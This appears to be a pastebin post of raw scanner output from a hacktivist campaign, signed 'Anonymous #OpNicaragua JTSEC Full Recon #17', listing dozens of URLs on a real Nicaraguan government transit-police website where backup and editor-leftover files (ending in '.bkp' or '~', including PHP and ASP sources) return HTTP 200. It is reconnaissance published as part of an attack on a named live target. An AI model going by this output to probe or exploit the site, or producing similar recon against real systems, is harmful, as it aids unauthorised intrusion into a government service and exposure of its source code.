- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/js~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/a.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/a~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad/feed~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json/oembed/1.0.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/planes-de-seguridad/feed.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Restriction.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-json/oembed/1.0~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Restriction.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Registry.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Registry.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Net.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/Net~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/gzdecode.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/gzdecode.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.php~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.php.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/Text/Diff.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/XML~
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/function.require-once.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/SimplePie/XML.bkp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-includes/function.require-once~
- #######################################################################################################################################
- Anonymous #OpNicaragua JTSEC Full Recon #17
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement